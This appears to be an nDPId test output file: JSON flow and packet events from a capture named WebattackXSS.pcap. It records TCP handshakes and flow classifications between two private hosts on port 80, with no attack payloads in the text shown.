-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3610,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":3,"flow_last_seen":1499347400753,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347400753,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0pC1AAD4GIausEAABwKgKMt3YAFC0oCr8gbWRlYAQAOU5mAAAAQEICgE6jtgD5GBN"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347403327,"flow_last_seen":1499347403327,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347403327,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56818,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":1,"flow_last_seen":1499347403327,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347403327,"pkt":"ABm5CmnxAMGxFOsxCABFAAA89cJAAD4G0A2sEAABwKgKMt3yAFCprWSZAAAAAKACchDf5AAAAgQFtAQCCAoBOpFbAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3627,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":2,"flow_last_seen":1499347403327,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347403327,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3fKtl6seqa1kmqAScSAhWAAAAgQFtAQCCAoD5GLRATqRWwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3628,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":3,"flow_last_seen":1499347403328,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347403328,"pkt":"ABm5CmnxAMGxFOsxCABFAAA09cNAAD4G0BSsEAABwKgKMt3yAFCprWSarZerH4AQAOXAXwAAAQEICgE6kVsD5GLR"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3638,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347404575,"flow_last_seen":1499347404575,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347404575,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56832,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3638,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":1,"flow_last_seen":1499347404575,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347404575,"pkt":"ABm5CmnxAMGxFOsxCABFAAA871lAAD4G1nasEAABwKgKMt4AAFBz\/X3KAAAAAKACchD7HQAAAgQFtAQCCAoBOpKTAAAAAAEDAwc="} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3639,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":2,"flow_last_seen":1499347404575,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347404575,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3gCf5c\/zc\/19y6AScSAkNgAAAgQFtAQCCAoD5GQJATqSkwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3641,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":3,"flow_last_seen":1499347404576,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347404576,"pkt":"ABm5CmnxAMGxFOsxCABFAAA071pAAD4G1n2sEAABwKgKMt4AAFBz\/X3Ln+XP9IAQAOXDPQAAAQEICgE6kpMD5GQJ"} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347276278,"flow_last_seen":1499347281695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347404726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55470,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347276278,"flow_last_seen":1499347281695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347404726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55470,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347277521,"flow_last_seen":1499347282696,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347404726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55484,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347277521,"flow_last_seen":1499347282696,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347404726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55484,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347280049,"flow_last_seen":1499347285697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347404726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55510,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347280049,"flow_last_seen":1499347285697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347404726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55510,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347281325,"flow_last_seen":1499347286697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347404726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55524,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347281325,"flow_last_seen":1499347286697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347404726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55524,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347282573,"flow_last_seen":1499347287697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347404726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55538,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347282573,"flow_last_seen":1499347287697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347404726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55538,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3659,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347407100,"flow_last_seen":1499347407100,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347407100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56858,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3659,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":1,"flow_last_seen":1499347407100,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347407100,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8oV1AAD4GJHOsEAABwKgKMt4aAFCK7TRXAAAAAKACchArEAAAAgQFtAQCCAoBOpUKAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3660,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":2,"flow_last_seen":1499347407100,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347407100,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3hoI+EKiiu00WKAScSB18AAAAgQFtAQCCAoD5GaAATqVCgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3661,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":3,"flow_last_seen":1499347407101,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347407101,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0oV5AAD4GJHqsEAABwKgKMt4aAFCK7TRYCPhCo4AQAOUU9wAAAQEICgE6lQsD5GaA"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3668,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347408367,"flow_last_seen":1499347408367,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347408367,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56872,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3668,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":1,"flow_last_seen":1499347408367,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347408367,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8lz9AAD4GLpGsEAABwKgKMt4oAFBdawF4AAAAAKACchCKJgAAAgQFtAQCCAoBOpZHAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3669,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":2,"flow_last_seen":1499347408367,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347408367,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3igaCcJ\/XWsBeaAScSBC2wAAAgQFtAQCCAoD5Ge9ATqWRwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3670,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":3,"flow_last_seen":1499347408368,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347408368,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0l0BAAD4GLpisEAABwKgKMt4oAFBdawF5GgnCgIAQAOXh4gAAAQEICgE6lkcD5Ge9"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3680,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347409644,"flow_last_seen":1499347409644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347409644,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56886,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3680,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":1,"flow_last_seen":1499347409644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347409644,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8tAhAAD4GEcisEAABwKgKMt42AFAiiCOOAAAAAKACchChpgAAAgQFtAQCCAoBOpeGAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3681,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":2,"flow_last_seen":1499347409644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347409644,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3ja0TSQNIogjj6AScSBdSgAAAgQFtAQCCAoD5Gj8ATqXhgEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3682,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":3,"flow_last_seen":1499347409645,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347409645,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0tAlAAD4GEc+sEAABwKgKMt42AFAiiCOPtE0kDoAQAOX8UAAAAQEICgE6l4cD5Gj8"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3698,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347412160,"flow_last_seen":1499347412160,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347412160,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56912,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3698,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":1,"flow_last_seen":1499347412160,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347412160,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8VIxAAD4GcUSsEAABwKgKMt5QAFAbQM13AAAAAKACchD8dQAAAgQFtAQCCAoBOpn7AAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3699,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":2,"flow_last_seen":1499347412160,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347412160,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3lBjDHLSG0DNeKAScSC4IAAAAgQFtAQCCAoD5GtxATqZ+wEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3700,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":3,"flow_last_seen":1499347412161,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347412161,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0VI1AAD4GcUusEAABwKgKMt5QAFAbQM14Ywxy04AQAOVXJwAAAQEICgE6mfwD5Gtx"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3710,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347413405,"flow_last_seen":1499347413405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347413405,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56926,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3710,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":1,"flow_last_seen":1499347413405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347413405,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8g\/NAAD4GQd2sEAABwKgKMt5eAFDJGhjAAAAAAKACchACDQAAAgQFtAQCCAoBOpszAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3711,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":2,"flow_last_seen":1499347413405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347413405,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3l7I3\/YFyRoYwaAScSDTeQAAAgQFtAQCCAoD5GyoATqbMwEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3712,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":3,"flow_last_seen":1499347413405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347413405,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0g\/RAAD4GQeSsEAABwKgKMt5eAFDJGhjByN\/2BoAQAOVygQAAAQEICgE6mzMD5Gyo"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347414709,"flow_last_seen":1499347414709,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56940,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":1,"flow_last_seen":1499347414709,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347414709,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LQhAAD4GmMisEAABwKgKMt5sAFBxqrFxAAAAAKACchC\/dwAAAgQFtAQCCAoBOpx5AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3724,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":2,"flow_last_seen":1499347414710,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347414710,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3mzO8Ll1caqxcqAScSDGHAAAAgQFtAQCCAoD5G3vATqceQEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3725,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":3,"flow_last_seen":1499347414710,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347414710,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0LQlAAD4GmM+sEAABwKgKMt5sAFBxqrFyzvC5doAQAOVlJAAAAQEICgE6nHkD5G3v"} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347228091,"flow_last_seen":1499347294990,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232370,"flow_avg_l4_payload_len":749,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54956,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347285114,"flow_last_seen":1499347290698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55564,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347285114,"flow_last_seen":1499347290698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55564,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 